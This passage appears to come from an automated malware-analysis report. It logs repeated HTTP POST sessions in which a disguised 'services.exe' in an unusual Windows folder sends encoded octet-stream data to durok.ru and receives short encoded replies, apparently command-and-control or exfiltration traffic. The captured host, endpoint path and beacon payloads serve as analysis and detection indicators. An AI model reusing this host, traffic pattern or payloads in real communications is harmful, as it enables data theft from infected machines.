                                                                                                                              Data Ascii: 98$Z)9 /,Q*>:S*W9_?2%X??(495)'%.%.\'\(3%=>"B>6$Y# ])#$Z;</-4[<2!!Q;69?%=9T!#'T&-6;U$<2+R7=+"&<9Y=9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.2.449780104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:54.265453100 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:54.614887953 CET2548OUTData Raw: 59 50 5e 5a 51 5e 59 5a 5e 58 52 54 56 5f 58 51 54 55 5b 58 56 5f 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^ZQ^YZ^XRTV_XQTU[XV_SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+W+?)"(^8Q*7='7<4<##"99?<V X*5"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:55.445168972 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:55.698139906 CET800INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:55 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJ%2B3XBYKpGaL4qv0epqkJyslvNVFsB1%2Bukr7sIotNC4Ti0MGuCXExEukXdiRykH6h3CztIhUpDN4P%2B%2B0X2jUmsNc6SWiG%2B7QfyitSwMN2NHYjhBiQViwxQnUUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262407d370caa-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4145&min_rtt=1668&rtt_var=5579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=67957&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.2.449781104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:56.502676964 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:56.850047112 CET2548OUTData Raw: 59 51 5e 5f 54 5d 5c 55 5e 58 52 54 56 58 58 50 54 54 5b 59 56 52 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^_T]\U^XRTVXXPTT[YVRS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$)2(?)5V!1(/>9Q?$%3B0#,'#:$E+0_=5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:57.559779882 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:57.814156055 CET802INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pY0xPtoQzE6r3U6RpvaT%2B%2FtkUZibCasF495bRbcF0Uuo9uxN3tu%2FUsGOXZw3%2FKZ7rp0Bcf%2F2nuXEvlfZTz54T46g%2Fdbr2FRKKaiYwPJj9D5pr7Bld86WCbHcnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82624dbf6e422b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3833&min_rtt=2015&rtt_var=4393&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=88132&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.2.449782104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:56.502757072 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:56.849900961 CET2108OUTData Raw: 59 5d 5b 5f 54 5d 59 53 5e 58 52 54 56 5a 58 50 54 5c 5b 54 56 56 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y][_T]YS^XRTVZXPT\[TVVSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(!3<)""+,)>'%3'3"<, ,2X99<E+#?="Z.#Z**
                                                                                                                              Dec 26, 2024 17:17:57.558933020 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:57.809720993 CET951INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YXDLYQpedkxq%2FTzN%2Fv4OGSQWMhJKYobP9Rycx2YscgN2Y75LGSki4FTV%2FAmmlWssrM4UGXLvq9XFTxHA%2FEXGHlhZpD8fEX2z6xtBPb9h%2FyffQq5ng7%2FGx4BrdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82624dbfc7330c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3706&min_rtt=1751&rtt_var=4567&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=83936&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 59 28 29 3b 1a 23 5a 30 1c 28 04 25 0e 3d 21 03 58 2b 54 2d 59 29 2c 2e 52 3f 38 27 1a 34 2a 26 5a 28 2a 24 58 31 50 32 1f 25 31 2e 5c 05 1d 27 5e 3c 15 01 02 27 32 0f 59 2b 2e 3a 0b 29 10 35 5f 33 11 3c 03 37 02 2a 17 23 08 27 02 2f 3c 24 5b 39 2f 37 02 2b 0e 32 59 21 07 21 51 0c 1f 38 56 36 2a 30 06 25 3e 21 55 35 0e 3b 56 32 01 2e 1f 35 15 23 50 24 5c 27 5a 25 23 06 0b 22 2d 33 10 2a 2d 29 06 25 11 22 01 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Y();#Z0(%=!X+T-Y),.R?8'4*&Z(*$X1P2%1.\'^<'2Y+.:)5_3<7*#'/<$[9/7+2Y!!Q8V6*0%>!U5;V2.5#P$\'Z%#"-3*-)%"+)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.2.449785104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:58.060703039 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:58.411860943 CET2548OUTData Raw: 59 5e 5e 5f 51 58 5c 56 5e 58 52 54 56 5d 58 56 54 53 5b 5e 56 53 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y^^_QX\V^XRTV]XVTS[^VSSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+ Z?)W!"<X;.%V*4._0'0 ,T"<.[,);<V?)"Z.#Z*6


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.2.449786104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:58.939213037 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:59.311815023 CET2128OUTData Raw: 59 5d 5b 5c 51 5f 5c 51 5e 58 52 54 56 5a 58 5b 54 51 5b 55 56 54 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y][\Q_\Q^XRTVZX[TQ[UVTS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+!?)6! X;>=1$B# ,04<-)'?*5"Z.#Z**
                                                                                                                              Dec 26, 2024 17:18:00.162339926 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:00.422095060 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:00 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W7qTXgE3C6yzoFirG0wbXGsPd%2BhUtRcGFzDQ1zDrQNSrLsoDJp%2B36lH0cr9IY21d20AysuytbNVK0MZvjtdR9xni794T7Q83pDVWq4GYxTgA5EhIMWTEJ59V4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82625dde017c88-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=20290&min_rtt=10778&rtt_var=23066&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=16805&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 00 2a 29 24 0a 20 3c 2c 51 2a 2d 39 0e 29 1f 39 1a 2a 21 25 14 28 06 31 0c 2b 06 24 0a 21 3a 32 5c 3e 14 28 1e 26 0f 3a 5c 31 21 2e 5c 05 1d 27 5b 3f 05 30 13 26 22 3e 07 3d 3e 31 1a 29 10 3d 16 24 2c 3c 01 20 15 2e 15 37 21 28 5d 2f 02 2f 03 2e 12 09 01 2b 33 2e 5a 21 3d 21 51 0c 1f 38 57 21 29 2b 58 27 3e 36 0f 36 0e 2b 50 32 2b 36 53 35 02 28 08 24 5c 24 04 31 33 0d 1e 23 03 2f 57 2b 3d 2e 13 24 3f 25 11 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'*)$ <,Q*-9)9*!%(1+$!:2\>(&:\1!.\'[?0&">=>1)=$,< .7!(]//.+3.Z!=!Q8W!)+X'>66+P2+6S5($\$13#/W+=.$?%+)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.2.449787104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:59.140369892 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:59.614674091 CET2548OUTData Raw: 59 5f 5e 5d 54 5f 59 56 5e 58 52 54 56 58 58 51 54 55 5b 58 56 54 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^]T_YV^XRTVXXQTU[XVTS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'</>)6"7;2>"_';[7<V"/%-:(>#8_)5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:00.309576035 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:00.561847925 CET798INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:00 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d95SgNV6NziUEoZDiQ6s6l%2FvARqEIAeFgwCvvPAYr24hday5%2FAZCxtCaDqp2avtm33%2FJWD2ikbZQdAaoOdB6ImDvAR7LpBFKOqZSap%2FcAsiWN4q9f2IFxOyX5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82625ee8dc7c99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3906&min_rtt=2054&rtt_var=4475&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=86528&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.2.449793104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:00.950109959 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:01.304847956 CET2548OUTData Raw: 59 51 5b 5c 54 5c 5c 50 5e 58 52 54 56 5e 58 56 54 53 5b 5b 56 52 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ[\T\\P^XRTV^XVTS[[VRS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')!7(.!"/,%=$$#// =:9$A<#0*5"Z.#Z*


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.2.449794104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:01.555041075 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:01.897756100 CET2108OUTData Raw: 59 5b 5e 58 54 58 59 57 5e 58 52 54 56 5e 58 54 54 5d 5b 5c 56 51 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^XTXYW^XRTV^XTT][\VQSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'("7+)W5T(Y.--W>.Y' 3"?9,9;>0'>"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:02.728480101 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:03.023091078 CET953INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2BFm9JhXKMpeM1Uq8ZAF4GpThycEPwxmp%2FQakBw79q0%2Fzq6lenvYDwWa35Lyi5o8ZeyAeXT%2BDl%2FV3tTTGwvev86Wi0gYYR%2B2NjLpLnT7WiecIPTG2NRhSE8n%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82626e0e6641af-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3877&min_rtt=1637&rtt_var=5095&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2439&delivery_rate=74630&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5a 3d 39 30 0a 20 3c 2c 1e 3f 04 3a 1b 3d 21 26 07 2a 31 3a 00 28 2f 3e 10 2b 28 20 09 23 3a 26 5d 2a 39 27 05 32 0f 29 02 31 31 2e 5c 05 1d 27 16 28 15 23 03 33 32 21 59 3e 3d 31 18 28 2e 13 5b 27 06 2b 58 23 2b 0b 02 20 1f 3f 02 3b 2c 28 5e 2e 3c 24 10 3c 30 22 11 21 2d 21 51 0c 1f 38 56 21 17 09 1c 31 00 21 56 21 0e 19 54 32 01 26 10 21 28 3b 54 27 04 2b 5a 32 0a 3b 53 37 2d 27 52 2b 3d 3d 06 24 3f 29 5c 2b 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Z=90 <,?:=!&*1:(/>+( #:&]*9'2)11.\'(#32!Y>=1(.['+X#+ ?;,(^.<$<0"!-!Q8V!1!V!T2&!(;T'+Z2;S7-'R+==$?)\+9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.2.449795104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:01.687414885 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:02.059895039 CET2548OUTData Raw: 59 5d 5e 50 51 5e 59 52 5e 58 52 54 56 5e 58 5a 54 5d 5b 59 56 52 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^PQ^YR^XRTV^XZT][YVRSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?0\<:="(^,X-V?'&$/] , ,:<8=5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:02.868697882 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:03.144517899 CET801INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEHyWjBhNA3kIol%2FtAon01iqJb9tVLRxaudPr%2FrsntZvS9dmiOF2Rw3PO7XrAJ%2F1pKZ%2BTdsJcA5GAtsFcqychL%2BumMAeKhJaOv6WwG1Y7VMxsMDbpwUtmpBF3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82626ed8187c82-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8595&min_rtt=2017&rtt_var=13913&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=26717&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              48192.168.2.449801104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:03.393332958 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
